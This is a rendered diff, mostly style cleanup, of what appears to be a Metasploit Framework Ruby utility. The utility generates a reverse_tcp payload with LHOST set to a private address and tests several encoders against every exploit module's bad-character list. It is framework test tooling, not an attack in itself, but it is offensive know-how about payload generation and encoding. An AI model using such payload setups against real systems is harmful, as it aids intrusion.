EXPLOITS.each_module do | name, mod |
|
||||
|
||||
EXPLOITS.each_module do |name, mod|
|
||||
exploit = mod.new
|
||||
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose
|
||||
print_line("\n#{encoder_name} v #{name} (#{format_badchars(exploit.payload_badchars)})") if verbose
|
||||
begin
|
||||
encoder = $msf.encoders.create( encoder_name )
|
||||
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil )
|
||||
encoder = $msf.encoders.create(encoder_name)
|
||||
raw = encoder.encode(payload, exploit.payload_badchars, nil, nil)
|
||||
success += 1
|
||||
rescue
|
||||
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose
|
||||
print_line(" FAILED! badchars=#{format_badchars(exploit.payload_badchars)}\n") if verbose
|
||||
fail += 1
|
||||
end
|
||||
end
|
||||
return [ success, fail ]
|
||||
end
|
||||
|
||||
def generate_payload( name )
|
||||
|
||||
payload = $msf.payloads.create( name )
|
||||
def generate_payload(name)
|
||||
payload = $msf.payloads.create(name)
|
||||
|
||||
# set options for a reverse_tcp payload
|
||||
payload.datastore['LHOST'] = '192.168.2.1'
|
||||
|
@ -67,30 +65,27 @@ def generate_payload( name )
|
|||
return payload.generate
|
||||
end
|
||||
|
||||
def run( encoders, payload_name, verbose=false )
|
||||
|
||||
payload = generate_payload( payload_name )
|
||||
def run(encoders, payload_name, verbose = false)
|
||||
payload = generate_payload(payload_name)
|
||||
|
||||
table = Rex::Text::Table.new(
|
||||
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ),
|
||||
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime("%d-%b-%Y %H:%M:%S"),
|
||||
'Indent' => 4,
|
||||
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
|
||||
)
|
||||
|
||||
encoders.each do | encoder_name |
|
||||
|
||||
success, fail = encoder_v_payload( encoder_name, payload, verbose )
|
||||
encoders.each do |encoder_name|
|
||||
success, fail = encoder_v_payload(encoder_name, payload, verbose)
|
||||
|
||||
table << [ encoder_name, success, fail ]
|
||||
|
||||
end
|
||||
|
||||
return table
|
||||
end
|
||||
|
||||
if( $0 == __FILE__ )
|
||||
if ($0 == __FILE__)
|
||||
|
||||
print_line( "[+] Starting.\n" )
|
||||
print_line("[+] Starting.\n")
|
||||
|
||||
encoders = [
|
||||
'x86/bloxor',
|
||||
|
@ -105,13 +100,9 @@ if( $0 == __FILE__ )
|
|||
|
||||
verbose = false
|
||||
|
||||
result_table = run( encoders, payload_name, verbose )
|
||||
result_table = run(encoders, payload_name, verbose)
|
||||
|
||||
print_line( "\n\n#{result_table.to_s}\n\n" )
|
||||
print_line("\n\n#{result_table.to_s}\n\n")
|
||||
|
||||
print_line( "[+] Finished.\n" )
|
||||
print_line("[+] Finished.\n")
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue